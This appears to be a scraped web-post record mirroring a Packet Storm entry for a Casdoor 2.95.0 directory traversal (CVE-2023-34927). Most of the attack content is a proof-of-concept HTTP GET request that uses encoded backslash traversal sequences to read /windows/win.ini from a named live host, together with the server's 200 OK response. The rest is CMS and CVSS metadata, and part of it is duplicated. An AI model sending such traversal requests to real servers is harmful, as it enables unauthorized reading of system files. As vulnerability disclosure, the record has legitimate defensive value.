{“lastseen”:”2025-12-11T17:25:57″,”description”:”Casdoor version 2.95.0 directory traversal proof of concept exploit…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Casdoor 2.95.0 Directory Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:212722″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-34927″],”sourceData”:”=============================================================================================================================================\\n | # Title : Casdoor 2.95.0 Directory Traversal |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/casdoor.com |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211122\/ \\u0026 \\tCVE-2023-34927\\n \\n [+] Summary : The vulnerability confirmed here is a Directory Traversal affecting an application running on Casdoor 2.95.0\\n \\n [+] POC :\\t\\n \\n GET \/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\/windows\/win.ini HTTP\/1.1\\n Host: door.casdoor.com\\n Connection: Keep-alive\\n Accept-Encoding: gzip,deflate\\n User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.21 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.21\\n Accept: *\/*\\n \\n Response\\n HTTP\/1.1 200 OK\\n Accept-Ranges: bytes\\n Content-Length: 92\\n Content-Type: text\/plain; charset=utf-8\\n Date: Sat, 06 Dec 2025 14:35:45 GMT\\n Last-Modified: Sat, 08 May 2021 08:18:31 GMT\\n Server: beegoServer:1.12.3\\n Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=\/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly\\n Original-Content-Encoding: gzip\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212722″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:N\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212722\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-11T17:25:57″,”description”:”Casdoor version 2.95.0 directory traversal proof of concept exploit…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Casdoor 2.95.0 Directory Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:212722″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-34927″],”sourceData”:”=============================================================================================================================================\\n | # Title : Casdoor 2.95.0 Directory Traversal |\\n | # Author…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-30435","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n